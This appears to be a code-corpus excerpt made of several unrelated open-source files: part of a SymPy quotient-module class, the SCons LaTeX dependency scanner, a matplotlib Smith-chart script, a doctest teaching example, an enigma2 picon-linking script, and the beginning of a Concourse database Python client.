        >>> Q.is_submodule(S)
        True
        >>> S.is_submodule(Q)
        False
        """
        if isinstance(other, QuotientModule):
            # Quotients are comparable only when taken by the same submodule.
            return self.killed_module == other.killed_module and \
                self.base.is_submodule(other.base)
        if isinstance(other, SubQuotientModule):
            return other.container == self
        return False

    def submodule(self, *gens, **opts):
        """
        Generate a submodule.

        This is the same as taking a quotient of a submodule of the base
        module.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> Q = QQ.old_poly_ring(x).free_module(2) / [(x, x)]
        >>> Q.submodule([x, 0])
        <[x, 0] + <[x, x]>>
        """
        return SubQuotientModule(gens, self, **opts)

    def convert(self, elem, M=None):
        """
        Convert ``elem`` into the internal representation.

        This method is called implicitly whenever computations involve elements
        not in the internal representation.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2) / [(1, 2), (1, x)]
        >>> F.convert([1, 0])
        [1, 0] + <[1, 2], [1, x]>
        """
        if isinstance(elem, QuotientModuleElement):
            if elem.module is self:
                return elem
            # Coercion from a coarser quotient is allowed when our killed
            # module contains the other one, so the projection is defined.
            if self.killed_module.is_submodule(elem.module.killed_module):
                return QuotientModuleElement(self, self.base.convert(elem.data))
            raise CoercionFailed
        return QuotientModuleElement(self, self.base.convert(elem))

    def identity_hom(self):
        """
        Return the identity homomorphism on ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> M = QQ.old_poly_ring(x).free_module(2) / [(1, 2), (1, x)]
        >>> M.identity_hom()
        Matrix([
        [1, 0], : QQ[x]**2/<[1, 2], [1, x]> -> QQ[x]**2/<[1, 2], [1, x]>
        [0, 1]])
        """
        return self.base.identity_hom().quotient_codomain(
            self.killed_module).quotient_domain(self.killed_module)

    def quotient_hom(self):
        """
        Return the quotient homomorphism to ``self``.

        That is, return a homomorphism representing the natural map from
        ``self.base`` to ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> M = QQ.old_poly_ring(x).free_module(2) / [(1, 2), (1, x)]
        >>> M.quotient_hom()
        Matrix([
        [1, 0], : QQ[x]**2 -> QQ[x]**2/<[1, 2], [1, x]>
        [0, 1]])
        """
        return self.base.identity_hom().quotient_codomain(
            self.killed_module)
| bsd-3-clause |
smart-make/zxing | cpp/scons/scons-local-2.0.0.final.0/SCons/Scanner/LaTeX.py | 34 | 15021 | """SCons.Scanner.LaTeX
This module implements the dependency scanner for LaTeX code.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Scanner/LaTeX.py 5023 2010/06/14 22:05:46 scons"
import os.path
import re
import SCons.Scanner
import SCons.Util
# list of graphics file extensions for TeX and LaTeX
TexGraphics = ['.eps', '.ps']
# graphics extensions understood when building with pdflatex (see
# PDFLaTeXScanner below)
LatexGraphics = ['.pdf', '.png', '.jpg', '.gif', '.tif']
# Used as a return value of modify_env_var if the variable is not set.
class _Null(object):
    pass

# NOTE: the sentinel is the class object itself, not an instance; callers
# compare against ``_null`` by identity to detect "variable was unset".
_null = _Null
# The user specifies the paths in env[variable], similar to other builders.
# They may be relative and must be converted to absolute, as expected
# by LaTeX and Co. The environment may already have some paths in
# env['ENV'][var]. These paths are honored, but the env[var] paths have
# higher precedence. All changes are un-done on exit.
def modify_env_var(env, var, abspath):
    """Prepend ``abspath`` and the absolutized paths from ``env[var]`` to
    ``env['ENV'][var]`` so they take precedence over pre-existing entries,
    and return the previous value so the caller can restore it on exit.

    Returns ``_null`` if ``env['ENV'][var]`` was not previously set.
    """
    try:
        save = env['ENV'][var]
    except KeyError:
        save = _null
    env.PrependENVPath(var, abspath)
    try:
        if SCons.Util.is_List(env[var]):
            env.PrependENVPath(var, [os.path.abspath(str(p)) for p in env[var]])
        else:
            # Split at os.pathsep to convert into absolute path
            env.PrependENVPath(var, [os.path.abspath(p) for p in str(env[var]).split(os.pathsep)])
    except KeyError:
        # env[var] itself is not set; only abspath was prepended above.
        pass
    # Convert into a string explicitly to append ":" (without which it won't search system
    # paths as well). The problem is that env.AppendENVPath(var, ":")
    # does not work, refuses to append ":" (os.pathsep).
    if SCons.Util.is_List(env['ENV'][var]):
        env['ENV'][var] = os.pathsep.join(env['ENV'][var])
    # Append the trailing os.pathsep character here to catch the case with no env[var]
    env['ENV'][var] = env['ENV'][var] + os.pathsep
    return save
class FindENVPathDirs(object):
    """A class to bind a specific *PATH variable name to a function that
    will return all of the *path directories."""

    def __init__(self, variable):
        # Name of the execution-environment variable (e.g. 'TEXINPUTS').
        self.variable = variable

    def __call__(self, env, dir=None, target=None, source=None, argument=None):
        import SCons.PathList
        try:
            path = env['ENV'][self.variable]
        except KeyError:
            # Variable not set: no directories to search.
            return ()
        dir = dir or env.fs._cwd
        # Expand construction variables in the path, then resolve each entry
        # relative to ``dir`` (searching up the directory tree).
        path = SCons.PathList.PathList(path).subst_path(env, target, source)
        return tuple(dir.Rfindalldirs(path))
def LaTeXScanner():
    """Return a prototype Scanner instance for scanning LaTeX source files
    when built with latex.
    """
    # Plain latex only understands the PostScript-based graphics formats;
    # the search order is given by TexGraphics.
    return LaTeX(name="LaTeXScanner",
                 suffixes='$LATEXSUFFIXES',
                 graphics_extensions=TexGraphics,
                 recursive=0)
def PDFLaTeXScanner():
    """Return a prototype Scanner instance for scanning LaTeX source files
    when built with pdflatex.
    """
    # pdflatex accepts a different set of graphics formats; the search
    # order is given by LatexGraphics.
    return LaTeX(name="PDFLaTeXScanner",
                 suffixes='$LATEXSUFFIXES',
                 graphics_extensions=LatexGraphics,
                 recursive=0)
class LaTeX(SCons.Scanner.Base):
    """Class for scanning LaTeX files for included files.

    Unlike most scanners, which use regular expressions that just
    return the included file name, this returns a tuple consisting
    of the keyword for the inclusion ("include", "includegraphics",
    "input", or "bibliography"), and then the file name itself.

    Based on a quick look at LaTeX documentation, it seems that we
    should append .tex suffix for the "include" keywords, append .tex if
    there is no extension for the "input" keyword, and need to add .bib
    for the "bibliography" keyword that does not accept extensions by itself.

    Finally, if there is no extension for an "includegraphics" keyword
    latex will append .ps or .eps to find the file, while pdftex may use .pdf,
    .jpg, .tif, .mps, or .png.

    The actual subset and search order may be altered by
    DeclareGraphicsExtensions command. This complication is ignored.
    The default order corresponds to experimentation with teTeX
        $ latex --version
        pdfeTeX 3.141592-1.21a-2.2 (Web2C 7.5.4)
        kpathsea version 3.5.4
    The order is:
        ['.eps', '.ps'] for latex
        ['.png', '.pdf', '.jpg', '.tif'].

    Another difference is that the search path is determined by the type
    of the file being searched:
    env['TEXINPUTS'] for "input" and "include" keywords
    env['TEXINPUTS'] for "includegraphics" keyword
    env['TEXINPUTS'] for "lstinputlisting" keyword
    env['BIBINPUTS'] for "bibliography" keyword
    env['BSTINPUTS'] for "bibliographystyle" keyword

    FIXME: also look for the class or style in document[class|style]{}
    FIXME: also look for the argument of bibliographystyle{}
    """
    # Maps each recognized keyword to the construction variable holding the
    # search path for the kind of file that keyword references.
    keyword_paths = {'include': 'TEXINPUTS',
                     'input': 'TEXINPUTS',
                     'includegraphics': 'TEXINPUTS',
                     'bibliography': 'BIBINPUTS',
                     'bibliographystyle': 'BSTINPUTS',
                     'usepackage': 'TEXINPUTS',
                     'lstinputlisting': 'TEXINPUTS'}
    env_variables = SCons.Util.unique(list(keyword_paths.values()))

    def __init__(self, name, suffixes, graphics_extensions, *args, **kw):
        # We have to include \n with the % we exclude from the first part
        # part of the regex because the expression is compiled with re.M.
        # Without the \n, the ^ could match the beginning of a *previous*
        # line followed by one or more newline characters (i.e. blank
        # lines), interfering with a match on the next line.
        regex = r'^[^%\n]*\\(include|includegraphics(?:\[[^\]]+\])?|lstinputlisting(?:\[[^\]]+\])?|input|bibliography|usepackage){([^}]*)}'
        self.cre = re.compile(regex, re.M)
        self.graphics_extensions = graphics_extensions

        def _scan(node, env, path=(), self=self):
            # Scanner entry point: resolve the node (possibly from a
            # Repository) and recurse from its directory, like latex does.
            node = node.rfile()
            if not node.exists():
                return []
            return self.scan_recurse(node, path)

        class FindMultiPathDirs(object):
            """The stock FindPathDirs function has the wrong granularity:
            it is called once per target, while we need the path that depends
            on what kind of included files is being searched. This wrapper
            hides multiple instances of FindPathDirs, one per the LaTeX path
            variable in the environment. When invoked, the function calculates
            and returns all the required paths as a dictionary (converted into
            a tuple to become hashable). Then the scan function converts it
            back and uses a dictionary of tuples rather than a single tuple
            of paths.
            """
            def __init__(self, dictionary):
                self.dictionary = {}
                for k, n in dictionary.items():
                    self.dictionary[k] = (SCons.Scanner.FindPathDirs(n),
                                          FindENVPathDirs(n))

            def __call__(self, env, dir=None, target=None, source=None,
                         argument=None):
                di = {}
                for k, (c, cENV) in self.dictionary.items():
                    di[k] = (c(env, dir=None, target=None, source=None,
                               argument=None),
                             cENV(env, dir=None, target=None, source=None,
                                  argument=None))
                # To prevent "dict is not hashable error"
                return tuple(di.items())

        class LaTeXScanCheck(object):
            """Skip all but LaTeX source files, i.e., do not scan *.eps,
            *.pdf, *.jpg, etc.
            """
            def __init__(self, suffixes):
                self.suffixes = suffixes

            def __call__(self, node, env):
                current = not node.has_builder() or node.is_up_to_date()
                scannable = node.get_suffix() in env.subst_list(self.suffixes)[0]
                # Returning false means that the file is not scanned.
                return scannable and current

        kw['function'] = _scan
        kw['path_function'] = FindMultiPathDirs(LaTeX.keyword_paths)
        kw['recursive'] = 0
        kw['skeys'] = suffixes
        kw['scan_check'] = LaTeXScanCheck(suffixes)
        kw['name'] = name

        SCons.Scanner.Base.__init__(self, *args, **kw)

    def _latex_names(self, include):
        """Return candidate file names for an (keyword, filename) tuple,
        appending the default suffix each keyword implies (see the class
        docstring)."""
        filename = include[1]
        if include[0] == 'input':
            base, ext = os.path.splitext(filename)
            if ext == "":
                return [filename + '.tex']
        if include[0] == 'include':
            return [filename + '.tex']
        if include[0] == 'bibliography':
            base, ext = os.path.splitext(filename)
            if ext == "":
                return [filename + '.bib']
        if include[0] == 'usepackage':
            base, ext = os.path.splitext(filename)
            if ext == "":
                return [filename + '.sty']
        if include[0] == 'includegraphics':
            base, ext = os.path.splitext(filename)
            if ext == "":
                #return [filename+e for e in self.graphics_extensions + TexGraphics]
                # use the line above to find dependencies for the PDF builder
                # when only an .eps figure is present. Since it will be found
                # if the user tells scons how to make the pdf figure, leave
                # it out for now.
                return [filename + e for e in self.graphics_extensions]
        return [filename]

    def sort_key(self, include):
        return SCons.Node.FS._my_normcase(str(include))

    def find_include(self, include, source_dir, path):
        """Locate *include* relative to *source_dir*, trying the env[var]
        directories first and the env['ENV'][var] directories second.
        Returns (node-or-None, include)."""
        try:
            sub_paths = path[include[0]]
        except (IndexError, KeyError):
            # BUGFIX: fall back to a pair of empty tuples.  The previous
            # fallback of a bare () raised IndexError at sub_paths[0] below
            # whenever the keyword was missing from the path dictionary.
            sub_paths = ((), ())
        try_names = self._latex_names(include)
        for n in try_names:
            # see if we find it using the path in env[var]
            i = SCons.Node.FS.find_file(n, (source_dir,) + sub_paths[0])
            if i:
                return i, include
            # see if we find it using the path in env['ENV'][var]
            i = SCons.Node.FS.find_file(n, (source_dir,) + sub_paths[1])
            if i:
                return i, include
        # _latex_names always returns at least one name, so i is bound (None).
        return i, include

    def scan(self, node):
        # Modify the default scan function to allow for the regular
        # expression to return a comma separated list of file names
        # as can be the case with the bibliography keyword.
        # BUGFIX: raw string so '\[' is a regex escape, not an invalid
        # Python string escape (a SyntaxWarning/DeprecationWarning in py3).
        noopt_cre = re.compile(r'\[.*$')
        # Cache the includes list in node so we only scan it once:
        if node.includes is not None:
            includes = node.includes
        else:
            includes = self.cre.findall(node.get_text_contents())
            # 1. Split comma-separated lines, e.g.
            #    ('bibliography', 'phys,comp')
            #    should become two entries
            #    ('bibliography', 'phys')
            #    ('bibliography', 'comp')
            # 2. Remove the options, e.g., such as
            #    ('includegraphics[clip,width=0.7\\linewidth]', 'picture.eps')
            #    should become
            #    ('includegraphics', 'picture.eps')
            split_includes = []
            for include in includes:
                inc_type = noopt_cre.sub('', include[0])
                for inc in include[1].split(','):
                    split_includes.append((inc_type, inc))
            includes = split_includes
            node.includes = includes
        return includes

    def scan_recurse(self, node, path=()):
        """ do a recursive scan of the top level target file
        This lets us search for included files based on the
        directory of the main file just as latex does"""
        path_dict = dict(list(path))
        queue = []
        queue.extend(self.scan(node))
        seen = {}

        # This is a hand-coded DSU (decorate-sort-undecorate, or
        # Schwartzian transform) pattern. The sort key is the raw name
        # of the file as specifed on the \include, \input, etc. line.
        # TODO: what about the comment in the original Classic scanner:
        # """which lets
        # us keep the sort order constant regardless of whether the file
        # is actually found in a Repository or locally."""
        nodes = []
        source_dir = node.get_dir()
        while queue:
            include = queue.pop()
            # Skip names we have already processed.
            try:
                if seen[include[1]] == 1:
                    continue
            except KeyError:
                seen[include[1]] = 1

            n, i = self.find_include(include, source_dir, path_dict)
            if n is None:
                # Do not bother with 'usepackage' warnings, as they most
                # likely refer to system-level files
                if include[0] != 'usepackage':
                    SCons.Warnings.warn(SCons.Warnings.DependencyWarning,
                                        "No dependency generated for file: %s (included from: %s) -- file not found" % (i, node))
            else:
                sortkey = self.sort_key(n)
                nodes.append((sortkey, n))
                # recurse down
                queue.extend(self.scan(n))

        return [pair[1] for pair in sorted(nodes)]
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| apache-2.0 |
hfegetude/EjerciciosMicroondas | tema3/ej7/parte4.py | 1 | 5836 | import numpy as np
import matplotlib.pyplot as plt
def cart2pol(x, y):
    """Convert Cartesian coordinates to polar (angle, radius)."""
    return np.arctan2(y, x), np.hypot(x, y)
def pol2cart(theta, rho):
    """Convert polar (angle, radius) to Cartesian coordinates."""
    return rho * np.cos(theta), rho * np.sin(theta)
def add_radius(x, y, r ):
    """Return (x, y) moved radially away from the origin by r."""
    theta, rho = cart2pol(x, y)
    return pol2cart(theta, rho + r)
def adjustFigAspect(fig,aspect=1):
    """Adjust the subplot parameters so that the figure has the correct
    aspect ratio (drawing area centered at (0.5, 0.5) in figure coords).
    """
    xsize, ysize = fig.get_size_inches()
    shortest = min(xsize, ysize)
    half_w = .4 * shortest / xsize
    half_h = .4 * shortest / ysize
    # Shrink one dimension to achieve the requested aspect ratio.
    if aspect < 1:
        half_w *= aspect
    else:
        half_h /= aspect
    fig.subplots_adjust(left=.5 - half_w,
                        right=.5 + half_w,
                        bottom=.5 - half_h,
                        top=.5 + half_h)
def colision(r0, r1, p1x, p1y, p2x, p2y):
    """Return one intersection point of two circles: radius r0 centred at
    (p1x, p1y) and radius r1 centred at (p2x, p2y).  Of the two possible
    intersections, this returns the one offset by -h along the
    perpendicular (colisionM returns the mirror point).
    """
    d = np.hypot(p2x - p1x, p2y - p1y)
    # Distance from centre 1 to the chord joining the intersections.
    a = (r0 * r0 - r1 * r1 + d * d) / (2 * d)
    # Half-length of the chord.
    h = np.sqrt(r0 * r0 - a * a)
    midx = p1x + a * (p2x - p1x) / d
    midy = p1y + a * (p2y - p1y) / d
    return midx - h * (p2y - p1y) / d, midy + h * (p2x - p1x) / d
def colisionM(r0, r1, p1x, p1y, p2x, p2y):
    """Return one intersection point of two circles: radius r0 centred at
    (p1x, p1y) and radius r1 centred at (p2x, p2y).  Mirror image of
    colision(): the point offset by +h along the perpendicular.
    """
    d = np.hypot(p2x - p1x, p2y - p1y)
    # Distance from centre 1 to the chord joining the intersections.
    a = (r0 * r0 - r1 * r1 + d * d) / (2 * d)
    # Half-length of the chord.
    h = np.sqrt(r0 * r0 - a * a)
    midx = p1x + a * (p2x - p1x) / d
    midy = p1y + a * (p2y - p1y) / d
    return midx + h * (p2y - p1y) / d, midy - h * (p2x - p1x) / d
def line(i):
    """Draw the upper-half constant-reactance arc for normalized reactance i
    and label it just outside the chart rim.

    Uses the module-level axes ``ax`` plus the helpers ``colision`` and
    ``add_radius``.
    """
    # Reactance circle: centre (1, 1/i), radius 1/i.
    x = 1 + (1/i) * np.cos(np.arange(0 , 2*np.pi , 0.0001))
    y = (1/(i))+(1/(i)) * np.sin(np.arange(0 , 2*np.pi , 0.0001))
    # Intersection of this circle with the unit circle: the point where the
    # arc meets the chart boundary (used to clip and to place the label).
    x_t , y_t = colision(1, 1/i, 0, 0, 1, 1/i)
    # Keep only the samples inside the chart and below the boundary point.
    x_f = x[x < 1]
    y_f = y[x < 1]
    y_f = y_f[x_f > -1]
    x_f = x_f[x_f > -1]
    x_f = x_f[y_f < y_t ]
    y_f = y_f[y_f < y_t ]
    ax.plot(x_f, y_f , 'k', linewidth = 0.2)
    # Label slightly outside the rim, rotated to follow the local radius.
    x_text , y_text = add_radius(x_t, y_t, 0.01)
    ax.text( x_text,
             y_text,
             str(i),
             verticalalignment='center',
             horizontalalignment='center',
             rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
             fontsize=3)
    ##ax.plot(x_text, y_text, 'ko')
def line2(i):
    """Draw the lower-half constant-reactance arc (reactance -i) and its
    label; mirror image of line().  Uses the module-level axes ``ax``.
    """
    # Reactance circle for -i: centre (1, -1/i), radius 1/i.
    x = 1 + (1/(-1*i)) * np.cos(np.arange( -np.pi , np.pi, 0.0001))
    y = (1/(i*-1))+(1/(i*-1)) * np.sin(np.arange(-np.pi , np.pi, 0.0001))
    # Boundary crossing with the unit circle (mirrored variant).
    x_t , y_t = colisionM(1, 1/i, 0, 0, 1, -1/i)
    # Keep only the samples inside the chart and above the boundary point.
    x_f = x[x < 1]
    y_f = y[x < 1]
    y_f = y_f[x_f > -1]
    x_f = x_f[x_f > -1]
    x_f = x_f[y_f > y_t ]
    y_f = y_f[y_f > y_t ]
    # Label slightly outside the rim, rotated to follow the local radius.
    x_text , y_text = add_radius(x_t, y_t, 0.02)
    ax.text( x_text,
             y_text,
             str(i),
             verticalalignment='center',
             horizontalalignment='center',
             rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
             fontsize=3)
    #ax.plot(x_t, y_t, 'ko')
    # The first few samples are skipped when plotting the arc.
    ax.plot( x_f[20:] ,y_f[20:] , 'k', linewidth = 0.2)
def paint_line(i, ax):
    """Draw the full set of gridlines for normalized value i: the
    constant-resistance circle plus both constant-reactance arcs
    (via line()/line2()), with the value labelled on the real axis.
    """
    # Resistance circle: centre (i/(1+i), 0), radius 1/(1+i).
    x = i/(1+i) + (1/(1+i)) * np.cos(np.arange(0 , 2*np.pi , 0.001))
    y = (1/(1+i)) * np.sin(np.arange(0 , 2*np.pi , 0.001))
    ax.plot(x, y, 'k', linewidth = 0.2)
    # Label at the circle's left crossing of the real axis.
    ax.text( 1-2*(1/(1+i)),
             0.02,
             str(i),
             verticalalignment='bottom',
             horizontalalignment='right',
             rotation=90,
             fontsize=3)
    line(i)
    line2(i)
def paint_text_degrees():
    """Write the 0..350 degree labels, every 10 degrees, just outside the
    unit circle (radius 1.04).  Uses the module-level axes ``ax``.
    """
    positions = np.arange(0, np.pi*2, 2*np.pi / 36)
    for i, ang in enumerate(positions):
        x_t , y_t = pol2cart(ang, 1.04)
        ax.text( x_t,
                 y_t,
                 str(i*10),
                 verticalalignment='center',
                 horizontalalignment='center',
                 rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
                 fontsize=3)
def paint_text_wavelength():
    """Write the wavelength scale (0.0 to 0.49 in steps of 0.01) outside the
    degree labels (radius 1.06), starting at the 180-degree point.
    """
    positions = np.arange(np.pi, 3*np.pi, 2*np.pi / 50)
    for i, ang in enumerate(positions):
        x_t , y_t = pol2cart(ang, 1.06)
        ax.text( x_t,
                 y_t,
                 str(i/100),
                 verticalalignment='center',
                 horizontalalignment='center',
                 rotation=np.angle(x_t + y_t*1j, deg=True) - 90 ,
                 fontsize=3)
def imp2point(v1, v2):
    """Return the chart coordinates of the normalized impedance v1 + j*v2,
    i.e. the intersection of its resistance and reactance circles.
    """
    # Resistance circle: centre (v1/(1+v1), 0), radius 1/(1+v1).
    res_cx, res_cy, res_r = v1/(1+v1), 0, 1/(1+v1)
    # Reactance circle: centre (1, 1/v2), radius 1/v2.
    rea_cx, rea_cy, rea_r = 1, 1/v2, 1/v2
    return colision(res_r, rea_r, res_cx, res_cy, rea_cx, rea_cy)
def move_wl(x, y , wl):
    """Rotate (x, y) about the origin by wl wavelengths (4*pi*wl radians),
    keeping the radius unchanged.
    """
    theta, rho = cart2pol(x, y)
    return pol2cart(theta + 4 * np.pi * wl, rho)
# Chart outline: the unit circle plus the horizontal (real) axis.
x_1= np.cos(np.arange(0 , 2*np.pi , 0.001))
y_1 = np.sin(np.arange(0, 2*np.pi, 0.001) )
fig = plt.figure()
adjustFigAspect(fig,aspect=1)
ax = fig.add_subplot(111)
ax.set_ylim(-1.01 , 1.01)
ax.set_xlim(-1.01, 1.01)
ax.axis('off')
ax.plot(x_1, y_1 , 'k', linewidth = 0.3)
#fig.axhline(y=0, xmin=-0.99, xmax=0.99, color='k', hold=None, linewidth = 0.5)
ax.plot([1, -1], [0, 0], 'k', linewidth = 0.3)
#ax.plot([0], [0], 'ko')
#black big lines
# Gridlines, drawn more densely for small normalized values.
for i in np.arange(0.05, 0.2, 0.05):
    paint_line(i , ax)
for i in np.arange(0.2, 1, 0.1):
    paint_line(i , ax)
for i in np.arange(1, 2, 0.2):
    paint_line(i , ax)
for i in np.arange(2, 5, 1):
    paint_line(i , ax)
for i in np.array([5, 10, 20, 50]):
    paint_line(i , ax)
paint_text_degrees()
paint_text_wavelength()
# Mark the point for the normalized impedance 1.4 + 0.8j.
p1 , p2 = imp2point(1.4, 0.8)
ax.plot(p1, p2, 'ko')
start, modd= cart2pol(p1, p2)
print(start, modd)
# Constant-radius arc from that point to the real-axis crossing at angle 0.
p3, p4 = pol2cart(0,modd)
ax.plot(p3, p4, 'ko')
end, modd= cart2pol(p3, p4)
data_x = modd*np.cos(np.arange(start , end , -0.0001))
data_y = modd*np.sin(np.arange(start , end , -0.0001))
ax.plot(data_x, data_y)
# Continue the arc from angle 0 to the opposite crossing at 180 degrees.
p3, p4 = pol2cart(np.pi,modd)
ax.plot(p3, p4, 'ko')
end2, modd= cart2pol(p3, p4)
data_x = modd*np.cos(np.arange(0 , -np.pi , -0.0001))
data_y = modd*np.sin(np.arange(0 , -np.pi , -0.0001))
ax.plot(data_x, data_y)
fig.savefig('images/out4.pdf')
| gpl-3.0 |
CormacGG/Python-CI-Testing | doctestexample.py | 10 | 2102 | #!/usr/bin/python3
################################
# File Name: DocTestExample.py
# Author: Chadd Williams
# Date: 10/17/2014
# Class: CS 360
# Assignment: Lecture Examples
# Purpose: Demonstrate PyTest
################################
# Run these test cases via:
# chadd@bart:~> python3 -m doctest -v DocTestExample.py
# Simple int example
def testIntAddition(left: int, right: int)->"sum of left and right":
    """Test the + operator for ints
    Test a simple two in example
    >>> testIntAddition(1,2)
    3
    Use the same int twice, no problem
    >>> testIntAddition(2,2)
    4
    Try to add a list to a set! TypeError!
    Only show the first and last lines for the error message
    The ... is a wild card
    The ... is tabbed in TWICE
    >>> testIntAddition([2], {3})
    Traceback (most recent call last):
    ...
    TypeError: can only concatenate list (not "set") to list
    """
    # NOTE: the int annotations are not enforced at runtime; any operands
    # supporting '+' are accepted, which is what lets the last doctest
    # provoke a TypeError from list + set.
    return left + right
# Simple List example
def printFirstItemInList(theList: "list of items"):
    """ Retrieve the first item from the list and print it
    Test a list of ints
    >>> printFirstItemInList( [ 0, 1, 2] )
    0
    Test a list of strings
    >>> printFirstItemInList( ["CS 360", "CS 150", "CS 300" ] )
    CS 360
    Generate a list comphrension
    >>> printFirstItemInList( [ x+1 for x in range(10) ] )
    1
    Work with a list of tuples
    >>> printFirstItemInList( [ (x,x+1, x-1) for x in range(10) ] )
    (0, 1, -1)
    """
    # An empty list raises IndexError here; the doctests only cover
    # non-empty inputs.
    item = theList[0]
    print(item)
# Test Output of print and return value
# that \ at the end of the line allows you to continue
# the same statement on the next line!
def printAndReturnSum(*args: "variadic param")\
->"return sum of ints provided as parameters":
""" Print and return the sum of the args that are ints
>>> printAndReturnSum(1,2,3)
6
6
>>> printAndReturnSum("bob", 1)
1
1
"""
total = 0
for x in args:
# type check at run time!
if type(x) is int :
total += x
print(total)
return total
| gpl-2.0 |
sklnet/openblackhole-enigma2 | tools/create_picon_links.py | 192 | 1273 | #
# create links for picon
# usage: create_picon_links lamedb
# run in picon directory.
# It will read the servicenames from the lamedb and create symlinks
# for the servicereference names.
import os, sys
f = open(sys.argv[1]).readlines()
f = f[f.index("services\n")+1:-3]
while len(f):
ref = [int(x, 0x10) for x in f[0][:-1].split(':')]
name = f[1][:-1]
name = name.replace('\xc2\x87', '').replace('\xc2\x86', '')
# SID:NS:TSID:ONID:STYPE:UNUSED(channelnumber in enigma1)
# X X X X D D
# REFTYPE:FLAGS:STYPE:SID:TSID:ONID:NS:PARENT_SID:PARENT_TSID:UNUSED
# D D X X X X X X X X
refstr = "1:0:%X:%X:%X:%X:%X:0:0:0" % (ref[4], ref[0], ref[2], ref[3], ref[1])
refstr = refstr.replace(':', '_')
filename = name + ".png"
linkname = refstr + ".png"
filename = filename.replace('/', '_').replace('\\', '_').replace('&', '_').replace('\'', '').replace('"', '').replace('`', '')
filename = filename.replace('\n', '')
for i in range(len(filename)):
if ord(filename[i]) > 127:
filename = filename[0:i] + '_' + filename[i + 1:]
if os.access(filename, os.F_OK) and not os.access(linkname, os.F_OK):
os.symlink(filename, linkname)
else:
print "could not find %s (%s)" % (filename, name)
f =f[3:]
| gpl-2.0 |
prateek135/concourse | concourse-driver-python/concourse/concourse.py | 7 | 49719 | __author__ = "Jeff Nelson"
__copyright__ = "Copyright 2015, Cinchapi Inc."
__license__ = "Apache, Version 2.0"
from thrift import Thrift
from thrift.transport import TSocket
from thriftapi import ConcourseService
from thriftapi.shared.ttypes import *
from utils import *
from collections import OrderedDict
import ujson
from configparser import ConfigParser
import itertools
import os
class Concourse(object):
""" Concourse is a self-tuning database that makes it easier to quickly build reliable and scalable systems.
Concourse dynamically adapts to any application and offers features like automatic indexing, version control, and
distributed ACID transactions within a big data platform that manages itself, reduces costs and allows developers
to focus on what really matters.
Data Model:
The Concourse data model is lightweight and flexible. Unlike other databases, Concourse is completely schemaless and
does not hold data in tables or collections. Concourse is simply a distributed document-graph. All data is
stored in records (similar to documents or rows in other databases). Each record has multiple keys. And each
key has one or more distinct values. Like any graph, you can link records to one another. And the structure of one
record does not affect the structure of another.
- Record: A logical grouping of data about a single person, place or thing (i.e. an object). Each record is
identified by a unique primary key.
- Key: A attribute that maps to one or more distinct values.
- Value: A dynamically typed quantity.
Data Types:
Concourse natively stores the following primitives: bool, double, integer, string (UTF-8) and Tag (a string that is
not full text searchable). Any other data type will be stored as its __str__ representation.
Links:
Concourse allows linking a key in one record to another record using the link() function. Links are retrievable and
queryable just like any other value.
Transactions:
By default, Concourse conducts every operation in autocommit mode where every change is immediately written.
You can also stage a group of operations in an ACID transaction. Transactions are managed using the stage(),
commit() and abort() commands.
Version Control:
Concourse automatically tracks every changes to data and the API exposes several methods to tap into this feature.
1) You can get() and select() previous version of data by specifying a timestamp using natural language or a unix
timestamp integer in microseconds.
2) You can browse() and find() records that matched a criteria in the past by specifying a timestamp using natural
language or a unix timestamp integer in microseconds.
3) You can audit() and diff() changes over time, revert() to previous states and chronologize() how data has
evolved within a range of time.
"""
    @staticmethod
    def connect(host="localhost", port=1717, username="admin", password="admin", environment="", **kwargs):
        """ Alias for the constructor: open and return a new client connection.

        Accepts the same arguments as Concourse.__init__ (including the
        'prefs' keyword alias) and returns the connected handle.
        """
        return Concourse(host, port, username, password, environment, **kwargs)
    def __init__(self, host="localhost", port=1717, username="admin", password="admin", environment="", **kwargs):
        """ Initialize a new client connection

        :param host: the server host (default: localhost)
        :param port: the listener post (default: 1717)
        :param username: the username with which to connect (default: admin)
        :param password: the password for the username (default: admin)
        :param environment: the environment to use, (default: the 'default_environment' in the server's
                            concourse.prefs file)

        You may specify the path to a preferences file using the 'prefs' keyword argument. If a prefs file
        is supplied, the values contained therewithin for any of arguments above become the default
        if the arguments are not explicitly given values.

        :return: the handle
        """
        # Credentials may also be supplied under aliased keyword names.
        username = username or find_in_kwargs_by_alias('username', kwargs)
        password = password or find_in_kwargs_by_alias('password', kwargs)
        prefs = find_in_kwargs_by_alias('prefs', kwargs)
        if prefs:
            # Hack to use ConfigParser with java style properties file:
            # prepend a dummy section header so the parser accepts it.
            with open(os.path.abspath(os.path.expanduser(prefs))) as stream:
                lines = itertools.chain(("[default]",), stream)
                prefs = ConfigParser()
                prefs.read_file(lines)
                prefs = dict(prefs._sections['default'])
        else:
            prefs = {}
        # NOTE(review): a value present in the prefs file takes precedence
        # over the corresponding constructor argument (the argument is only
